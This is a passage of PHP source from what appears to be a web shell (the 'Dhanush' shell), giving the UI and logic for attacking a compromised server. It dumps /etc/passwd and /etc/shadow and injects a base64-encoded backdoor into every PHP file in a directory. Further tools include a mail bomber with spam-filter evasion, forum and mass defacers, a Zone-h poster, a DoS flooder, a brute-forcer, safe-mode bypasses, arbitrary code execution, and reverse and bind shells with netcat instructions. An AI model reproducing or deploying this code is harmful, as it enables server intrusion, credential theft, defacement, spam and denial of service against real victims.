3635 $test='';
3636 $tempp= tempnam($test, "cx");
3637 $get = "/etc/passwd";
3638 $owner = "0/0";
3639 if($os == "Linux")
3640 $owner = getOGid($get);
3641 ?>
3642 <table style="width:57%;">
3643 <tr>
3644 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3645 </tr>
3646 <tr>
3647 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3648 </tr>
3649 </table>
3650 <?php
3651 if(copy("compress.zlib://".$get, $tempp))
3652 {
3653 $fopenzo = fopen($tempp, "r");
3654 $freadz = fread($fopenzo, filesize($tempp));
3655 fclose($fopenzo);
3656 $source = htmlspecialchars($freadz);
3657 echo "<tr><td><center><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3658 unlink($tempp);
3659 }
3660 else
3661 {
3662 ?>
3663 <form>
3664 <input type="hidden" name="etcpasswd">
3665 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3666 <tr>
3667 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3668 </tr>
3669 <tr>
3670 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3671 </tr>
3672 <tr>
3673 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3674 </tr>
3675 </table><br>
3676 </form>
3677 <?php
3678 }
3679 ?>
3680 <br />
3681 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
3682 <?php
3683 }
3684 else if(isset($_GET['shadow']))
3685 {
3686 $test='';
3687 $tempp= tempnam($test, "cx");
3688 $get = "/etc/shadow";
3689 if(copy("compress.zlib://".$get, $tempp))
3690 {
3691 $fopenzo = fopen($tempp, "r");
3692 $freadz = fread($fopenzo, filesize($tempp));
3693 fclose($fopenzo);
3694 $source = htmlspecialchars($freadz);
3695 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3696 unlink($tempp);
3697 }
3698 }
3699 else if(isset($_GET['bomb']))
3700 {
3701 ?><div id="showmail"></div>
3702 <form>
3703 <table id="margins" style="width:100%;">
3704 <tr>
3705 <td style="width:30%;">To</td>
3706 <td>
3707 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3708 </td>
3709 </tr>
3710 <tr>
3711 <td style="width:30%;">Subject</td>
3712 <td>
3713 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3714 </td>
3715 </tr>
3716 <tr>
3717 <td style="width:30%;">No. of Times</td>
3718 <td>
3719 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3720 </td>
3721 </tr>
3722 <tr>
3723 <td style="width:30%;">Pad your message (Less spam detection)</td>
3724 <td><input type="checkbox" name="padding"/></td>
3725 </tr>
3726 <tr>
3727 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3728 </tr>
3729 <tr>
3730 <td rowspan="2">
3731 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3732 </td>
3733 </tr>
3734 </table>
3735 </form>
3736 <?php
3737 }
3738
3739 //Mass Mailer
3740 else if(isset($_GET['mail']))
3741 {
3742 ?><div id="showmail"></div>
3743 <div align="left">
3744 <form>
3745 <table align="left" style="width:100%;">
3746 <tr>
3747 <td style="width:10%;">From</td>
3748 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
3749 </tr>
3750
3751 <tr>
3752 <td style="width:20%;">To</td>
3753 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3754 </tr>
3755
3756 <tr>
3757 <td style="width:20%;">Subject</td>
3758 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3759 </tr>
3760
3761
3762 <tr>
3763 <td colspan="2">
3764 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3765 </td>
3766 </tr>
3767
3768
3769 <tr>
3770 <td rowspan="2">
3771 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3772 </td>
3773 </tr>
3774 </table>
3775 </form></div>
3776 <?php
3777 }
3778 else if(isset($_REQUEST["symlinkserver"]))
3779 {
3780 ?>
3781 <center><table><tr>
3782 <td><a href=javascript:void(0) onClick="getdata('perlsymlink')">| Perl Symlink |</a></td>
3783 <td><a href=javascript:void(0) onClick="getdata('symlink')">| Symlink Server |</a></td>
3784 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')">| Symlink File |</a></td>
3785 <td><a href=javascript:void(0) onClick="getdata('script')">| Script Locator |</a></td>
3786 </tr></table></center><br>
3787 <div id="showdata"></div><?php
3788 }
3789 // Forum Manager
3790 else if(isset($_REQUEST["forum"]))
3791 { ?>
3792 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font size="4">| Forum Defacer |</font></a></td>
3793 <td><a href=# onClick="getdata('passwordchange')"><font size="4">| Forum Password Changer |</font></a></td>
3794 <td><a href=# onClick="getdata('mymassdeface')"><font size="4">| Mass Defacer |</font></a></td>
3795 </tr></table></center><br><div id="showdata"></div>
3796 <?php
3797 }
3798 // Sec info
3799 else if(isset($_GET['secinfo']))
3800 { ?><div id=showdata></div><center><div id="showmydata"></div></center>
3801 <br><br><center><font size=5>Server security information</font><br><br></center>
3802 <table style="width:100%;" border="1" class="tbl">
3803 <tr>
3804 <td style="width:7%;">Curl</td>
3805 <td style="width:7%;">Oracle</td>
3806 <td style="width:7%;">MySQL</td>
3807 <td style="width:7%;">MSSQL</td>
3808 <td style="width:7%;">PostgreSQL</td>
3809 <td style="width:12%;">Open Base Directory</td>
3810 <td style="width:10%;">Safe_Exec_Dir</td>
3811 <td style="width:7%;">PHP Version</td>
3812 <td style="width:7%;">Magic Quotes</td>
3813 <td style="width:7%;">Server Admin</td>
3814 </tr>
3815 <tr>
3816 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3817 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3818 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3819
3820 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3821 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3822 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3823 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "NONE</b>";}else {echo "<font class=txt>$df</font></b>";};} ?></font></td>
3824 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3825 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3826 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3827 </tr>
3828 </table><br> <?php
3829 mysecinfo();
3830 }
3831 // Code Injector
3832 else if(isset($_GET['injector']))
3833 {
3834 if($os != "Windows")
3835 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
3836 else
3837 {
3838 $injectcode = "PD9waHAgJHBhc3N3cmQgPSA8PDxFT0QKNjJhYTZhOWE1ZGEwMDAxNDI4MGZlODU2YzI3MzhiMDYKRU9EOwokZGhwYXNzd2QgPSA8PDxFT0QKZGhwYXNzd2QKRU9EOwokdXBsb2FkZWQgPSA8PDxFT0QKdXBsb2FkZWQKRU9EOwokbmFtZSA9IDw8PEVPRApuYW1lCkVPRDsKJHRtcF9uYW1lID0gPDw8RU9ECnRtcF9uYW1lCkVPRDsKaWYgKGlzc2V0ICgkX0dFVFskZGhwYXNzd2RdKSBhbmQgbWQ1KCRfR0VUWyRkaHBhc3N3ZF0pPT0kcGFzc3dyZCkKez8+PGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIG1ldGhvZD1QT1NUIGFjdGlvbj0+dXBsb2FkOiA8aW5wdXQgbmFtZT11cGxvYWRlZCB0eXBlPWZpbGUgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9VXBsb2FkIC8+PC9mb3JtPgo8P3BocCAKaWYoaXNzZXQoJF9GSUxFU1skdXBsb2FkZWRdWyRuYW1lXSkpCnsKJHVwbG9hZGVkID0gPDw8RU9ECnVwbG9hZGVkCkVPRDsKJHRhcmdldF9wYXRoID0gPDw8RU9ECi4vCkVPRDsKJHRhcmdldF9wYXRoID0gJHRhcmdldF9wYXRoIC4gYmFzZW5hbWUoICRfRklMRVNbJHVwbG9hZGVkXVskbmFtZV0pOwppZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1skdXBsb2FkZWRdWyR0bXBfbmFtZV0sICR0YXJnZXRfcGF0aCkpIHtlY2hvICR1cGxvYWRlZDt9fX0KPz4=";
3839 }
3840 ?><form method='POST'>
3841 <table id="margins" >
3842 <tr>
3843 <td width="100" class="title">
3844 Directory
3845 </td>
3846 <td>
3847 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3848 </td>
3849 </tr>
3850 <tr>
3851 <td class="title">
3852 Mode
3853 </td>
3854 <td>
3855 <select style="width: 400px;" name="mode" class="box">
3856 <option value="Apender">Apender</option>
3857 <option value="Overwriter">Overwriter</option>
3858 </select>
3859 </td>
3860 </tr>
3861 <tr>
3862 <td class="title">
3863 File Type
3864 </td>
3865 <td>
3866 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3867 </td>
3868 </tr>
3869 <tr>
3870 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3871 </tr>
3872
3873 <tr>
3874 <td colspan="2"><?php if($os == "Windows"){echo "<i>Default Password is : <b>Dhanush</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Dhanush";}else{if(!function_exists('system')){echo "system() function disabled";}} ?><BR>
3875 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
3876 </td>
3877 </tr>
3878
3879
3880 <tr>
3881 <td rowspan="2">
3882 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3883 </td>
3884 </tr>
3885 </form>
3886 </table><div id="showinject"</div>
3887 <?php
3888 }
3889 // Bypass
3890 else if (isset($_GET["bypass"]))
3891 {
3892 ?><center><div id="showmydata"></div></center>
3893 <table cellpadding="7" align="center" border="3" style="width:70%;" class="pwdtbl">
3894 <tr>
3895 <td align="center" colspan="2"><font size="4">Safe mode bypass</font></td>
3896 </tr>
3897 <tr>
3898 <td align="center">
3899 <p>Using copy() function</p>
3900 <form onSubmit="bypassfun('copy',copy.value);return false;">
3901 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3902 </form>
3903 </td>
3904 <td align="center">
3905 <p>Using File Contents function</p>
3906 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
3907 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
3908 </form>
3909 </td>
3910 </tr>
3911 <tr>
3912 <td align="center">
3913 <p>Using Stream Contents function</p>
3914 <form onSubmit="bypassfun('stream',stream.value);return false;">
3915 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
3916 </form>
3917 </td>
3918 <td align="center">
3919 <p>Using Curl() function</p>
3920 <form onSubmit="bypassfun('curl',curl.value);return false;">
3921 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3922 </form>
3923 </td>
3924 </tr>
3925 <tr>
3926 <td align="center">
3927 <p>Bypass using include()</p>
3928 <form onSubmit="bypassfun('include',include.value);return false;">
3929 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3930 </form>
3931 </td>
3932 <td align="center">
3933 <p>Using id() function</p>
3934 <form onSubmit="bypassfun('id',id.value);return false;">
3935 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3936 </form>
3937 </td>
3938 </tr>
3939 <tr>
3940 <td align="center">
3941 <p>Using tempnam() function</p>
3942 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3943 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3944 </form>
3945 </td>
3946 <td align="center">
3947 <p>Using symlink() function</p>
3948 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3949 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3950 </form>
3951 </td>
3952 </tr>
3953 <tr>
3954 <td colspan=2 align="center">
3955 <p>Using Bypass function</p>
3956 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3957 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3958 <select id="optiontype" class=sbox>
3959 <option value="tac">tac</option>
3960 <option value="more">more</option>
3961 <option value="less">less</option>
3962 <option value="rev">rev</option>
3963 <option value="xxd">xxd</option>
3964 <option value="awk">awk</option>
3965 </select>
3966 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3967 </form>
3968 </td>
3969 </tr>
3970 </table>
3971 </form>
3972 <?php
3973 }
3974 //fuzzer
3975 else if(isset($_GET['fuzz']))
3976 {
3977 ?>
3978 <form method="GET">
3979 <table id="margins">
3980 <tr>
3981 <td width="400" class="title">IP</td>
3982 <td><input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/></td>
3983 </tr>
3984 <tr>
3985 <td class="title">Port</td>
3986 <td><input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/></td>
3987 </tr>
3988 <tr>
3989 <td class="title">Timeout</td>
3990 <td><input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/> </td>
3991 </tr>
3992 <tr>
3993 <td class="title">No of times</td>
3994 <td><input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" /></td>
3995 </tr>
3996 <tr>
3997 <td class="title">Message (The message Should be long and it will be multiplied with the value after it)</td>
3998 <td><input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/></td>
3999 <td>x</td>
4000 <td width="20"><input style="width: 30px;" class="box" name="messageMultiplier" value="10" /></td>
4001 </tr>
4002 <tr>
4003 <td rowspan="2"><input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/></td>
4004 </tr>
4005 </table>
4006 </form><div id="showdos"></div>
4007 <?php
4008 }
4009
4010 //DDos
4011 else if(isset($_GET['dos']))
4012 {
4013 ?>
4014 <form method="GET">
4015 <table id="margins">
4016 <tr>
4017 <td width="400" class="title">
4018 IP
4019 </td>
4020 <td>
4021 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4022 </td>
4023 </tr>
4024
4025 <tr>
4026 <td class="title">
4027 Port
4028 </td>
4029 <td>
4030 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4031 </td>
4032 </tr>
4033
4034 <tr>
4035 <td class="title">
4036 Timeout (Time in seconds)
4037 </td>
4038 <td>
4039 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
4040 </td>
4041 </tr>
4042
4043
4044 <tr>
4045 <td class="title">
4046 Execution Time (Time in seconds)
4047 </td>
4048 <td>
4049 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
4050 </td>
4051 </tr>
4052
4053 <tr>
4054 <td class="title">
4055 No of Bytes per/packet
4056 </td>
4057 <td>
4058 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
4059 </td>
4060 </tr>
4061
4062
4063 <tr>
4064 <td rowspan="2">
4065 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
4066 </td>
4067 </tr>
4068 </table>
4069 </form><div id="showdos"></div>
4070 <?php
4071 }
4072 // Zone-h Poster
4073 else if(isset($_GET["zone"]))
4074 {
4075 if(!function_exists('curl_version'))
4076 {
4077 echo "<pre class=ml1 style='margin-top:5px'><center><font class=txt>PHP CURL NOT EXIST</font></center></pre>";
4078 }
4079 ?>
4080 <center><font size="4">Zone-h Poster</font></center>
4081 <form action="<?php echo $self; ?>" method="post">
4082 <table align="center" cellpadding="5" border="0">
4083 <tr>
4084 <td>
4085 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
4086 <tr><td>
4087 <select name="hackmode" class="box">
4088 <option >--------SELECT--------</option>
4089 <option value="1">known vulnerability (i.e. unpatched system)</option>
4090 <option value="2" >undisclosed (new) vulnerability</option>
4091 <option value="3" >configuration / admin. mistake</option>
4092 <option value="4" >brute force attack</option>
4093 <option value="5" >social engineering</option>
4094 <option value="6" >Web Server intrusion</option>
4095 <option value="7" >Web Server external module intrusion</option>
4096 <option value="8" >Mail Server intrusion</option>
4097 <option value="9" >FTP Server intrusion</option>
4098 <option value="10" >SSH Server intrusion</option>
4099 <option value="11" >Telnet Server intrusion</option>
4100 <option value="12" >RPC Server intrusion</option>
4101 <option value="13" >Shares misconfiguration</option>
4102 <option value="14" >Other Server intrusion</option>
4103 <option value="15" >SQL Injection</option>
4104 <option value="16" >URL Poisoning</option>
4105 <option value="17" >File Inclusion</option>
4106 <option value="18" >Other Web Application bug</option>
4107 <option value="19" >Remote administrative panel access bruteforcing</option>
4108 <option value="20" >Remote administrative panel access password guessing</option>
4109 <option value="21" >Remote administrative panel access social engineering</option>
4110 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
4111 <option value="23" >Access credentials through Man In the Middle attack</option>
4112 <option value="24" >Remote service password guessing</option>
4113 <option value="25" >Remote service password bruteforce</option>
4114 <option value="26" >Rerouting after attacking the Firewall</option>
4115 <option value="27" >Rerouting after attacking the Router</option>
4116 <option value="28" >DNS attack through social engineering</option>
4117 <option value="29" >DNS attack through cache poisoning</option>
4118 <option value="30" >Not available</option>
4119 </select>
4120 </td></tr>
4121 <tr><td>
4122 <select name="reason" class="box">
4123 <option >--------SELECT--------</option>
4124 <option value="1" >Heh...just for fun!</option>
4125 <option value="2" >Revenge against that website</option>
4126 <option value="3" >Political reasons</option>
4127 <option value="4" >As a challenge</option>
4128 <option value="5" >I just want to be the best defacer</option>
4129 <option value="6" >Patriotism</option>
4130 <option value="7" >Not available</option>
4131 </select></td></tr>
4132 <tr><td>
4133 <textarea name="domain" class="box" cols="53" rows="9">List Of Domains</textarea></td></tr>
4134 <tr><td>
4135 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
4136 </form><div id="showzone"></div>
4137 <?php }
4138 // Mail
4139 else if(isset($_GET['mailbomb']))
4140 { ?>
4141 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font size="4">| Mail Bomber |</font></a></td>
4142 <td><a href=javascript:void(0) onClick="getdata('mail')"><font size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
4143 <?php
4144 }
4145 else if(isset($_GET['tools']))
4146 {
4147 ?>
4148 <center><form onSubmit="getport(host.value,protocol.value);return false;">
4149 <table cellpadding="5" border="2" class="tbl" style="width:50%;">
4150 <tr>
4151 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
4152 </tr>
4153 <tr>
4154 <td align="center">
4155 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
4156 </td>
4157 <td align="center">
4158 <select class="sbox" name='protocol'>
4159 <option value='tcp'>tcp</option>
4160 <option value='udp'>udp</option>
4161 </select>
4162 </td>
4163 <tr>
4164 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
4165 </tr>
4166 </form>
4167
4168 <tr><td colspan=2><div id="showports"></div></td></tr></table>
4169 <br>
4170 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
4171 <table cellpadding="5" class="tbl" border="2" style="width:50%;">
4172 <tr>
4173 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
4174 </tr>
4175 <tr>
4176 <td>Type : </td>
4177 <td>
4178 <select name="prototype" class="sbox">
4179 <option value="ftp">FTP</option>
4180 <option value="mysql">MYSQL</option>
4181 <option value="postgresql">PostgreSql</option>
4182 </select>
4183 </td>
4184 </tr>
4185 <tr>
4186 <td>Server <b>:</b> Port : </td>
4187 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
4188 </tr>
4189 <tr>
4190 <td valign="middle">Brute type : </td>
4191 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
4192 <input type=radio name=mytype value="2"> Dictionary</label><br>
4193 Login : <input type="text" name="login" value="root" class="sbox"><br>
4194 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
4195 </td>
4196 </tr>
4197 <tr>
4198 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
4199 </tr><tr><td colspan="2" id="showbrute"></td></tr>
4200 </form>
4201 </table>
4202 </center><br>
4203 <?php
4204 }
4205 else if (isset($_GET["phpc"]))
4206 {
4207 ?>
4208 <div id="showresult"></div>
4209 <form name="frm">
4210 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
4211 <br /><br />
4212 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
4213 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font size="3">Display in Textarea</font></label>
4214 </form>
4215 <?php
4216 }
4217 // Exploit Search
4218 else if(isset($_GET["exploit"]))
4219 {
4220 if(!isset($_GET["rootexploit"]))
4221 {
4222 ?>
4223 <center>
4224 <form action="<?php echo $self; ?>" method="get" target="_blank">
4225 <input type="hidden" name="exploit">
4226 <table class="tbl" border="1" cellpadding="5" cellspacing="4" style="width:50%;">
4227 <tr>
4228 <td style="height:60px;">
4229 <font size="4">Select Website</font></td><td>
4230 <p><select id="rootexploit" name="rootexploit" class="box">
4231 <option value="exploit-db">Exploit-db</option>
4232 <option value="packetstormsecurity">Packetstormsecurity</option>
4233 <option value="exploitsearch">Exploitsearch</option>
4234 <option value="shodanhq">Shodanhq</option>
4235 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
4236 <input type="submit" value="Search" class="but"></td></tr></table>
4237 </form></center><br>
4238
4239 <?php
4240 }
4241 else
4242 {
4243 //exploit search
4244 $Lversion = php_uname(r);
4245 $OSV = php_uname(s);
4246 if(eregi('Linux',$OSV))
4247 {
4248 $Lversion=substr($Lversion,0,6);
4249 if($_GET['rootexploit'] == "exploit-db")
4250 {
4251 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
4252 }
4253 else if($_GET['rootexploit'] == "packetstormsecurity")
4254 {
4255 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
4256 }
4257 else if($_GET['rootexploit'] == "exploitsearch")
4258 {
4259 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
4260 }
4261 else if($_GET['rootexploit'] == "shodanhq")
4262 {
4263 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
4264 }
4265 }
4266 else
4267 {
4268 $Lversion=substr($Lversion,0,3);
4269 if($_GET['rootexploit'] == "exploit-db")
4270 {
4271 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
4272 }
4273 else if($_GET['rootexploit'] == "packetstormsecurity")
4274 {
4275 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
4276 }
4277 else if($_GET['rootexploit'] == "exploitsearch")
4278 {
4279 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
4280 }
4281 else if($_GET['rootexploit'] == "shodanhq")
4282 {
4283 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
4284 }
4285 }
4286 //End of Exploit search
4287 }
4288 }
4289 // Connect
4290 else if(isset($_GET['connect']))
4291 {
4292 ?><form method='post' >
4293 <table style="width:50%" align="center" >
4294 <tr>
4295 <th colspan="1" width="50px">Reverse Shell</th>
4296 <th colspan="1" width="50px">Bind Shell</th>
4297 </tr>
4298 <tr>
4299 <td>
4300 <table style="border-spacing: 6px;">
4301 <tr>
4302 <td>IP </td>
4303 <td>
4304 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
4305 </td>
4306 </tr>
4307 <tr>
4308 <td>Port </td>
4309 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
4310 </tr>
4311 <tr>
4312 <td style="vertical-align:top;">Use:</td>
4313 <td><select style="width: 95px;" name="lang" class="sbox">
4314 <option value="perl">Perl</option>
4315 <option value="python">Python</option>
4316 <option value="php">PHP</option>
4317 </select>
4318 <input style="width: 90px;" class="but" type="submit" value="Connect!" name="backconnect"/></td>
4319
4320 </tr>
4321 </table></form>
4322 </td>
4323 <td style="vertical-align:top;">
4324 <form method='post' >
4325 <table style="border-spacing: 6px;">
4326 <tr>
4327 <td>Port</td>
4328 <td>
4329 <input style="width: 200px;" class="box" name="port" value="9891" />
4330 </td>
4331 </tr>
4332 <tr>
4333 <td>Password </td>
4334 <td>
4335 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
4336 </td>
4337 <tr>
4338 <td>Using</td>
4339 <td>
4340 <select style="width: 95px;" name="lang" id="lang" class="sbox">
4341 <option value="perl">Perl</option>
4342 <option value="c">C</option>
4343 </select>
4344 <input style="width: 90px;" class="but"name="backdoor" type="submit" value=" Bind "/></td>
4345 </tr>
4346 </table>
4347 </td>
4348 </form>
4349 </tr>
4350 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
4351 </table>
4352 <?php if(isset($_GET['dir']) && $_GET['dir'] == 'hide')
4353 echo "<font color='#FFFFFF'>Trying to connect...</font></br>";
4354 }
4355 else if(isset($_GET['database']))
4356 { ?>
4357 <form action=<?php echo $self; ?> method="POST">
4358 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
4359 <tr>
4360 <td colspan="2">Connect To Database</td>
4361 </tr>
4362 <tr>
4363 <td>Server Address :</td>
4364 <td><input type="text" class="box" name="server" value="localhost"></td>
4365 </tr>
4366 <tr>
4367 <td>Username :</td>
4368 <td><input type="text" class="box" name="username" value="root"></td>
4369 </tr>
4370 <tr>
4371 <td>Password:</td>
4372 <td><input type="text" class="box" name="password" value=""></td>
4373 </tr>
4374
4375 <tr>
4376 <td></td>
4377 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
4378 </tr>
4379 </table>
4380 </form><div id="showsql"></div>
4381 <?php
